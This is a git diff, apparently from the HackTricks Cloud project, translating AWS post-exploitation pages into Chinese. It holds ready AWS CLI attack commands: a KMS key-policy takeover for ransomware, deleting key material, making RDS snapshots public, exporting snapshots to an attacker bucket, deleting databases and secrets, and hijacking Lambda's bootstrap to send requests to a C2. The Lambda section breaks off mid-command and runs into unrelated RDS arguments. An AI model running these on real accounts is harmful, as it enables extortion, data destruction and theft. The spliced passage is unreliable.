+避免 Confused Deputy 问题的常见方法是使用带有 `AWS:SourceArn` 的条件来检查源 ARN。然而,**某些服务可能不支持这一点**(根据一些来源,如 CloudTrail)。 ## References - [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md index 482af5425..d6bf5bc4c 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md @@ -1,137 +1,125 @@ -# AWS - KMS Post Exploitation +# AWS - KMS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## KMS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-kms-enum.md {{#endref}} -### Encrypt/Decrypt information +### 加密/解密信息 -`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files: +`fileb://` 和 `file://` 是在 AWS CLI 命令中用于指定本地文件路径的 URI 方案: -- `fileb://:` Reads the file in binary mode, commonly used for non-text files. -- `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements. +- `fileb://:` 以二进制模式读取文件,通常用于非文本文件。 +- `file://:` 以文本模式读取文件,通常用于纯文本文件、脚本或没有特殊编码要求的 JSON。 > [!TIP] -> Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://) - -- Using a **symmetric** key +> 请注意,如果您想解密文件中的某些数据,文件必须包含二进制数据,而不是 base64 编码的数据。 (fileb://) +- 使用 **对称** 密钥 ```bash # Encrypt data aws kms encrypt \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile +--key-id f0d3d719-b054-49ec-b515-4095b4777049 \ +--plaintext fileb:///tmp/hello.txt \ +--output text \ +--query CiphertextBlob | base64 \ +--decode > ExampleEncryptedFile # Decrypt data aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --key-id f0d3d719-b054-49ec-b515-4095b4777049 \ - --output text \ - --query Plaintext | base64 \ - --decode +--ciphertext-blob fileb://ExampleEncryptedFile \ +--key-id f0d3d719-b054-49ec-b515-4095b4777049 \ +--output text \ +--query Plaintext | base64 \ +--decode ``` - -- Using a **asymmetric** key: - +- 使用 **非对称** 密钥: ```bash # Encrypt data aws kms encrypt \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --plaintext fileb:///tmp/hello.txt \ - --output text \ - --query CiphertextBlob | base64 \ - --decode > ExampleEncryptedFile +--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ +--encryption-algorithm RSAES_OAEP_SHA_256 \ +--plaintext fileb:///tmp/hello.txt \ +--output text \ +--query CiphertextBlob | base64 \ +--decode > ExampleEncryptedFile # Decrypt data aws kms decrypt \ - --ciphertext-blob fileb://ExampleEncryptedFile \ - --encryption-algorithm RSAES_OAEP_SHA_256 \ - --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ - --output text \ - --query Plaintext | base64 \ - --decode +--ciphertext-blob fileb://ExampleEncryptedFile \ +--encryption-algorithm RSAES_OAEP_SHA_256 \ +--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \ +--output text \ +--query Plaintext | base64 \ +--decode ``` +### KMS 勒索软件 -### KMS Ransomware +拥有 KMS 特权访问权限的攻击者可以修改密钥的 KMS 策略并**授予他的账户访问权限**,同时移除授予合法账户的访问权限。 -An 
attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account. - -Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account. +这样,合法账户的用户将无法访问任何使用这些密钥加密的服务的信息,从而在账户上创建一个简单但有效的勒索软件。 > [!WARNING] -> Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**. - -> Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI). +> 请注意,**AWS 管理的密钥不受此攻击影响**,只有**客户管理的密钥**。 +> 还请注意需要使用参数 **`--bypass-policy-lockout-safety-check`**(在网页控制台中缺少此选项使得此攻击仅能通过 CLI 实现)。 ```bash # Force policy change aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \ - --policy-name default \ - --policy file:///tmp/policy.yaml \ - --bypass-policy-lockout-safety-check +--policy-name default \ +--policy file:///tmp/policy.yaml \ +--bypass-policy-lockout-safety-check { - "Id": "key-consolepolicy-3", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - } - ] +"Id": "key-consolepolicy-3", +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "kms:*", +"Resource": "*" +} +] } ``` - > [!CAUTION] -> Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**. +> 注意,如果您更改该策略并仅向外部帐户授予访问权限,然后从该外部帐户尝试设置新策略以**将访问权限恢复到原始帐户,您将无法**。
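(补充)由于 AWS 管理的密钥不受影响,可以先用下面的草图枚举哪些密钥是客户管理的(KeyManager 为 CUSTOMER),以确定可能受此攻击影响的目标:
```bash
# Identify customer managed keys (only these are affected by the attack above)
for key in $(aws kms list-keys --query 'Keys[].KeyId' --output text); do
  aws kms describe-key --key-id "$key" \
    --query 'KeyMetadata.[KeyId,KeyManager,KeyState]' --output text
done
```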
-### Generic KMS Ransomware +### 通用 KMS 勒索软件 -#### Global KMS Ransomware +#### 全球 KMS 勒索软件 -There is another way to perform a global KMS Ransomware, which would involve the following steps: +执行全球 KMS 勒索软件还有另一种方法,涉及以下步骤: -- Create a new **key with a key material** imported by the attacker -- **Re-encrypt older data** encrypted with the previous version with the new one. -- **Delete the KMS key** -- Now only the attacker, who has the original key material could be able to decrypt the encrypted data - -### Destroy keys +- 创建一个新的 **密钥,密钥材料由攻击者导入** +- **使用新密钥重新加密** 使用先前版本加密的旧数据。 +- **删除 KMS 密钥** +- 现在只有拥有原始密钥材料的攻击者才能解密加密数据 +### 销毁密钥 ```bash # Destoy they key material previously imported making the key useless aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab # Schedule the destoy of a key (min wait time is 7 days) aws kms schedule-key-deletion \ - --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ - --pending-window-in-days 7 +--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ +--pending-window-in-days 7 ``` - > [!CAUTION] -> Note that AWS now **prevents the previous actions from being performed from a cross account:** +> 请注意,AWS 现在**防止从跨账户执行之前的操作:**
{{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md index 5f25c205a..1e2823a48 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md @@ -1,33 +1,29 @@ -# AWS - Lambda Post Exploitation +# AWS - Lambda 后期利用 {{#include ../../../../banners/hacktricks-training.md}} ## Lambda -For more information check: +有关更多信息,请查看: {{#ref}} ../../aws-services/aws-lambda-enum.md {{#endref}} -### Steal Others Lambda URL Requests +### 窃取其他 Lambda URL 请求 -If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. +如果攻击者以某种方式在 Lambda 内部获得 RCE,他将能够窃取其他用户对该 Lambda 的 HTTP 请求。如果请求包含敏感信息(cookies、凭证等),他将能够窃取这些信息。 {{#ref}} aws-warm-lambda-persistence.md {{#endref}} -### Steal Others Lambda URL Requests & Extensions Requests +### 窃取其他 Lambda URL 请求和扩展请求 -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. +滥用 Lambda Layers 也可以滥用扩展并在 Lambda 中持久化,同时窃取和修改请求。 {{#ref}} ../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md {{#endref}} {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md index bc93fe53a..427cd8026 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md @@ -6,37 +6,36 @@

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

-1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. -2. The init process listens on port **9001** exposing some interesting endpoints: - - **`/2018-06-01/runtime/invocation/next`** – get the next invocation event - - **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke - - **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error -3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). -4. Finally, **bootstrap.py** sends to init the **response** +1. **Slicer** 是一个在容器外部的进程,它 **发送** **调用** 到 **init** 进程。 +2. init 进程监听端口 **9001**,暴露一些有趣的端点: +- **`/2018-06-01/runtime/invocation/next`** – 获取下一个调用事件 +- **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – 返回调用的处理程序响应 +- **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – 返回执行错误 +3. **bootstrap.py** 有一个循环从 init 进程获取调用,并调用用户代码来处理它们 (**`/next`**). +4. 最后,**bootstrap.py** 将 **响应** 发送给 init -Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. +注意,bootstrap 将用户代码作为模块加载,因此用户代码执行的任何代码实际上都是在这个进程中发生的。 ## Stealing Lambda Requests -The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. +此次攻击的目标是让用户代码在处理易受攻击请求的 **`bootstrap.py`** 进程内部执行一个恶意的 **`bootstrap.py`** 进程。这样,**恶意 bootstrap** 进程将开始 **与 init 进程通信** 以处理请求,而 **合法** 的 bootstrap 被 **困住** 运行恶意进程,因此它不会向 init 进程请求请求。 -This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: +这是一个简单的任务,因为用户的代码是由合法的 **`bootstrap.py`** 进程执行的。因此攻击者可以: -- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. - - A request must be sent to **`/${invoke-id}/response`** - - The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). -- Execute a malicious **`boostrap.py`** which will handle the next invocations - - For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. - - For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. 
+- **向 init 进程发送当前调用的假结果**,使 init 认为 bootstrap 进程在等待更多调用。 +- 必须向 **`/${invoke-id}/response`** 发送请求 +- invoke-id 可以通过使用 [**inspect**](https://docs.python.org/3/library/inspect.html) python 模块从合法的 **`bootstrap.py`** 进程的堆栈中获取(如 [这里所提议](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py))或再次请求 **`/2018-06-01/runtime/invocation/next`**(如 [这里所提议](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py))。 +- 执行一个恶意的 **`boostrap.py`**,它将处理下一个调用 +- 为了隐蔽性,可以将 lambda 调用参数发送到攻击者控制的 C2,然后像往常一样处理请求。 +- 对于此攻击,只需从系统或 [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py) 获取原始的 **`bootstrap.py`** 代码,添加恶意代码并从当前 lambda 调用中运行它即可。 ### Attack Steps -1. Find a **RCE** vulnerability. -2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) -3. **Execute** the malicious bootstrap. - -You can easily perform these actions running: +1. 找到一个 **RCE** 漏洞。 +2. 生成一个 **恶意** **bootstrap**(例如 [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) +3. **执行** 恶意 bootstrap。 +您可以轻松地通过运行以下命令来执行这些操作: ```bash python3 < \ - --db-subnet-group-name \ - --publicly-accessible \ - --vpc-security-group-ids +--db-instance-identifier "new-db-not-malicious" \ +--db-snapshot-identifier \ +--db-subnet-group-name \ +--publicly-accessible \ +--vpc-security-group-ids aws rds modify-db-instance \ - --db-instance-identifier "new-db-not-malicious" \ - --master-user-password 'Llaody2f6.123' \ - --apply-immediately +--db-instance-identifier "new-db-not-malicious" \ +--master-user-password 'Llaody2f6.123' \ +--apply-immediately # Connect to the new DB after a few mins ``` - ### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot` -An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot. - -If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**. +拥有这些权限的攻击者可以**创建数据库的快照**并使其**公开可用**。然后,他可以在自己的账户中从该快照创建一个数据库。 +如果攻击者**没有 `rds:CreateDBSnapshot`**,他仍然可以使**其他**创建的快照**公开**。 ```bash # create snapshot aws rds create-db-snapshot --db-instance-identifier --db-snapshot-identifier @@ -54,43 +51,32 @@ aws rds create-db-snapshot --db-instance-identifier --d aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all ## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"} ``` - ### `rds:DownloadDBLogFilePortion` -An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions. 
- +拥有 `rds:DownloadDBLogFilePortion` 权限的攻击者可以 **下载 RDS 实例日志文件的部分内容**。如果敏感数据或访问凭证被意外记录,攻击者可能会利用这些信息来提升他们的权限或执行未经授权的操作。 ```bash aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text ``` - -**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials. +**潜在影响**:访问敏感信息或使用泄露的凭据进行未经授权的操作。 ### `rds:DeleteDBInstance` -An attacker with these permissions can **DoS existing RDS instances**. - +拥有这些权限的攻击者可以**对现有的 RDS 实例进行 DoS 攻击**。 ```bash # Delete aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot ``` - -**Potential impact**: Deletion of existing RDS instances, and potential loss of data. +**潜在影响**:删除现有的 RDS 实例,并可能导致数据丢失。 ### `rds:StartExportTask` > [!NOTE] -> TODO: Test - -An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot. +> TODO: 测试 +拥有此权限的攻击者可以**将 RDS 实例快照导出到 S3 存储桶**。如果攻击者控制了目标 S3 存储桶,他们可能会访问导出快照中的敏感数据。 ```bash aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id ``` - -**Potential impact**: Access to sensitive data in the exported snapshot. +**潜在影响**:访问导出快照中的敏感数据。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md index 16cc52f27..bc8756e3b 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md @@ -1,42 +1,38 @@ -# AWS - S3 Post Exploitation +# AWS - S3 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## S3 -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-s3-athena-and-glacier-enum.md {{#endref}} -### Sensitive Information +### 敏感信息 -Sometimes you will be able to find sensitive information in readable in the buckets. For example, terraform state secrets. +有时您可以在存储桶中找到可读的敏感信息。例如,terraform 状态机密。 -### Pivoting +### 侧向渗透 -Different platforms could be using S3 to store sensitive assets.\ -For example, **airflow** could be storing **DAGs** **code** in there, or **web pages** could be directly served from S3. An attacker with write permissions could **modify the code** from the bucket to **pivot** to other platforms, or **takeover accounts** modifying JS files. +不同的平台可能会使用 S3 存储敏感资产。\ +例如,**airflow** 可能会在其中存储 **DAGs** **代码**,或者 **网页** 可能会直接从 S3 提供服务。具有写入权限的攻击者可以 **修改存储桶中的代码** 以 **侧向渗透** 到其他平台,或 **接管账户** 修改 JS 文件。 -### S3 Ransomware +### S3 勒索软件 -In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. However, the objects cannot be decrypted. 
+在这种情况下,**攻击者在他们自己的 AWS 账户** 或另一个被攻陷的账户中创建一个 KMS(密钥管理服务)密钥。然后,他们使这个 **密钥对全世界的任何人可用**,允许任何 AWS 用户、角色或账户使用此密钥加密对象。然而,这些对象无法被解密。 -The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more. +攻击者识别一个目标 **S3 存储桶并获得写入级别的访问权限**,使用各种方法。这可能是由于糟糕的存储桶配置使其公开可见,或者攻击者获得了 AWS 环境本身的访问权限。攻击者通常针对包含敏感信息的存储桶,例如个人身份信息(PII)、受保护的健康信息(PHI)、日志、备份等。 -To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket. +为了确定存储桶是否可以被用作勒索软件的目标,攻击者检查其配置。这包括验证是否启用了 **S3 对象版本控制** 和 **多因素身份验证删除(MFA 删除)是否启用**。如果未启用对象版本控制,攻击者可以继续。如果启用了对象版本控制但未启用 MFA 删除,攻击者可以 **禁用对象版本控制**。如果同时启用了对象版本控制和 MFA 删除,攻击者就更难对该特定存储桶进行勒索软件攻击。 -Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key. +使用 AWS API,攻击者 **用他们的 KMS 密钥替换存储桶中的每个对象为加密副本**。这有效地加密了存储桶中的数据,使其在没有密钥的情况下无法访问。 -To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. This gives the target a 7-day window to recover their data before the key is deleted and the data becomes permanently lost. +为了施加更大的压力,攻击者安排删除在攻击中使用的 KMS 密钥。这给目标提供了 7 天的时间窗口,以在密钥被删除之前恢复他们的数据,之后数据将永久丢失。 -Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack. +最后,攻击者可以上传一个最终文件,通常命名为 "ransom-note.txt",其中包含目标如何检索其文件的说明。该文件未加密上传,可能是为了引起目标的注意并让他们意识到勒索软件攻击。 -**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.** +**有关更多信息** [**请查看原始研究**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**。** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md index e59cbbaaa..c89233c99 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md @@ -4,50 +4,40 @@ ## Secrets Manager -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}} -### Read Secrets +### 读取秘密 -The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. 
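(补充)一个枚举并读取密文当前值的最小草图(Secret 名称为占位符):
```bash
# List available secrets and read the current value of one of them (secret name is a placeholder)
aws secretsmanager list-secrets --query 'SecretList[].Name'
aws secretsmanager get-secret-value --secret-id <secret_name> --query SecretString --output text
```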
+**秘密本身是敏感信息**,[查看权限提升页面](../aws-privilege-escalation/aws-secrets-manager-privesc.md)以了解如何读取它们。 -### DoS Change Secret Value +### DoS 更改秘密值 -Changing the value of the secret you could **DoS all the system that depends on that value.** +更改秘密的值可能会**导致所有依赖该值的系统出现 DoS。** > [!WARNING] -> Note that previous values are also stored, so it's easy to just go back to the previous value. - +> 请注意,之前的值也会被存储,因此很容易回到之前的值。 ```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ - --secret-id MyTestSecret \ - --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" +--secret-id MyTestSecret \ +--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` - -### DoS Change KMS key - +### DoS 更改 KMS 密钥 ```bash aws secretsmanager update-secret \ - --secret-id MyTestSecret \ - --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE +--secret-id MyTestSecret \ +--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` +### DoS 删除秘密 -### DoS Deleting Secret - -The minimum number of days to delete a secret are 7 - +删除秘密的最少天数为 7 ```bash aws secretsmanager delete-secret \ - --secret-id MyTestSecret \ - --recovery-window-in-days 7 +--secret-id MyTestSecret \ +--recovery-window-in-days 7 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md index e67a07739..ddbae9a7f 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - SES Post Exploitation +# AWS - SES 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## SES -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ses-enum.md @@ -12,76 +12,58 @@ For more information check: ### `ses:SendEmail` -Send an email. - +发送电子邮件。 ```bash aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json ``` - -Still to test. +仍需测试。 ### `ses:SendRawEmail` -Send an email. - +发送电子邮件。 ```bash aws ses send-raw-email --raw-message file://message.json ``` - -Still to test. +仍需测试。 ### `ses:SendTemplatedEmail` -Send an email based on a template. - +根据模板发送电子邮件。 ```bash aws ses send-templated-email --source --destination --template ``` - -Still to test. +仍需测试。 ### `ses:SendBulkTemplatedEmail` -Send an email to multiple destinations - +向多个目标发送电子邮件 ```bash aws ses send-bulk-templated-email --source --template ``` - -Still to test. +仍需测试。 ### `ses:SendBulkEmail` -Send an email to multiple destinations. - +向多个目标发送电子邮件。 ``` aws sesv2 send-bulk-email --default-content --bulk-email-entries ``` - ### `ses:SendBounce` -Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. - +发送一封**退信邮件**,针对收到的邮件(表示该邮件无法被接收)。这只能在**收到邮件后的24小时内**完成。 ```bash aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list ``` - -Still to test. +仍需测试。 ### `ses:SendCustomVerificationEmail` -This will send a customized verification email. You might need permissions also to created the template email. 
- +这将发送一封自定义验证电子邮件。您可能还需要权限来创建模板电子邮件。 ```bash aws ses send-custom-verification-email --email-address --template-name aws sesv2 send-custom-verification-email --email-address --template-name ``` - -Still to test. +仍需测试。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md index b24660ee1..907f786f3 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md @@ -4,81 +4,65 @@ ## SNS -For more information: +更多信息: {{#ref}} ../aws-services/aws-sns-enum.md {{#endref}} -### Disrupt Messages +### 干扰消息 -In several cases, SNS topics are used to send messages to platforms that are being monitored (emails, slack messages...). If an attacker prevents sending the messages that alert about it presence in the cloud, he could remain undetected. +在多个情况下,SNS 主题用于向正在监控的平台发送消息(电子邮件、Slack 消息等)。如果攻击者阻止发送关于其在云中存在的警报消息,他可能会保持未被发现。 ### `sns:DeleteTopic` -An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic. - +攻击者可以删除整个 SNS 主题,导致消息丢失并影响依赖该主题的应用程序。 ```bash aws sns delete-topic --topic-arn ``` - -**Potential Impact**: Message loss and service disruption for applications using the deleted topic. +**潜在影响**:使用已删除主题的应用程序可能会导致消息丢失和服务中断。 ### `sns:Publish` -An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +攻击者可能会向SNS主题发送恶意或不需要的消息,可能导致数据损坏、触发意外操作或耗尽资源。 ```bash aws sns publish --topic-arn --message ``` - -**Potential Impact**: Data corruption, unintended actions, or resource exhaustion. +**潜在影响**:数据损坏、意外操作或资源耗尽。 ### `sns:SetTopicAttributes` -An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability. - +攻击者可以修改SNS主题的属性,可能会影响其性能、安全性或可用性。 ```bash aws sns set-topic-attributes --topic-arn --attribute-name --attribute-value ``` - -**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. +**潜在影响**:错误配置导致性能下降、安全问题或可用性降低。 ### `sns:Subscribe` , `sns:Unsubscribe` -An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. - +攻击者可以订阅或取消订阅SNS主题,可能会获得对消息的未经授权访问或干扰依赖该主题的应用程序的正常功能。 ```bash aws sns subscribe --topic-arn --protocol --endpoint aws sns unsubscribe --subscription-arn ``` - -**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic. +**潜在影响**:未经授权访问消息,依赖受影响主题的应用程序服务中断。 ### `sns:AddPermission` , `sns:RemovePermission` -An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic. - +攻击者可以授予未经授权的用户或服务访问SNS主题的权限,或撤销合法用户的权限,从而导致依赖该主题的应用程序正常运行受到干扰。 ```css aws sns add-permission --topic-arn --label --aws-account-id --action-name aws sns remove-permission --topic-arn --label ``` - -**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. 
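(补充)在执行下述操作之前,可以先用下面的草图查看主题当前的访问策略与订阅,以评估哪些告警/下游会受影响(主题 ARN 为占位符):
```bash
# Review the topic's current access policy and subscriptions first (topic ARN is a placeholder)
aws sns get-topic-attributes --topic-arn <topic_arn> --query 'Attributes.Policy' --output text
aws sns list-subscriptions-by-topic --topic-arn <topic_arn>
```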
